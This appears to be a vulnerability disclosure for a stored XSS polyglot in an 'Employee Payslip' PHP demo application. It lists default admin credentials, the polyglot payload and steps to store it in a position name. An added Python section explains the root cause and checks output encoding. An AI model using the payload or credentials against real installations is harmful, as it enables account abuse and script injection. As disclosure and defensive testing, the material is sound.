# Title: Employee Payslip - XSS Polyglots
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
# CVE: N/A
# XSS POLYGLOTS
# Screenshot : https://prnt.sc/eeUxgczBF-Gj
Payload used:
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
Admin account :
admin
admin123
Method:
Log in to the admin panel with the admin account: http://.../admin/
# Vulnerability
1. After logging in as SUPER ADMIN, go to http://.../admin/?page=positions (Position List page)
2. Click "Create New" and enter the payload in the "NAME" field: " onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
3. After the new position has been created, click in the form to execute the stored XSS polyglot payload
Enjoy!
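The root cause is that the stored position name is echoed back into the page without output encoding, so the leading quote in the payload closes the `value=""` attribute and the rest becomes a new event-handler attribute. The following is an added example (not code from the advisory or from the Employee Payslip project) that renders the advisory's payload through a vulnerable and a hardened template and includes a regression check a maintainer can run on the rendering layer; the templates `ATTR_TEMPLATE` and `TEXT_TEMPLATE` are constructed stand-ins for the edit form and the Position List table, not the project's real markup.

```python
import html

# The payload from the advisory, with straight quotes (the curly quotes on
# the page are an encoding artifact). It is the sample input for this check.
POLYGLOT = '" onclick=alert(1)//<button \' onclick=alert(1)//> */ alert(1)//'

# Constructed templates standing in for the two places the application shows
# a position name (assumed, not the project's real markup): the NAME input of
# the edit form (attribute context) and the Position List table (text context).
ATTR_TEMPLATE = '<input type="text" name="name" value="{name}">'
TEXT_TEMPLATE = '<td>{name}</td>'

# Characters that change HTML structure when they come from stored data.
METACHARS = '<>"\''


def render_unsafe(template: str, name: str) -> str:
    """Vulnerable pattern: the stored value is echoed verbatim, so the
    leading quote closes value="" and the rest becomes a new attribute."""
    return template.format(name=name)


def render_safe(template: str, name: str) -> str:
    """Hardened pattern: HTML-encode on output, quotes included, so the
    value stays a literal in both attribute and text context. The PHP
    equivalent is htmlspecialchars($name, ENT_QUOTES, 'UTF-8'). A value
    placed inside an inline <script> needs a JS/JSON encoder instead."""
    return template.format(name=html.escape(name, quote=True))


def leaked_metachars(rendered: str, template: str) -> dict:
    """Regression check for the rendering layer: counts HTML metacharacters
    present in the rendered markup beyond those in the template itself.
    A non-empty result means stored data contributed markup."""
    return {
        ch: rendered.count(ch) - template.count(ch)
        for ch in METACHARS
        if rendered.count(ch) > template.count(ch)
    }


if __name__ == "__main__":
    for template in (ATTR_TEMPLATE, TEXT_TEMPLATE):
        print("unsafe:", leaked_metachars(render_unsafe(template, POLYGLOT), template))
        print("safe:  ", leaked_metachars(render_safe(template, POLYGLOT), template))
```

The same check run against the real form after the fix should return an empty dict for any stored name; a non-empty result in a unit test is the signal that an output path was missed.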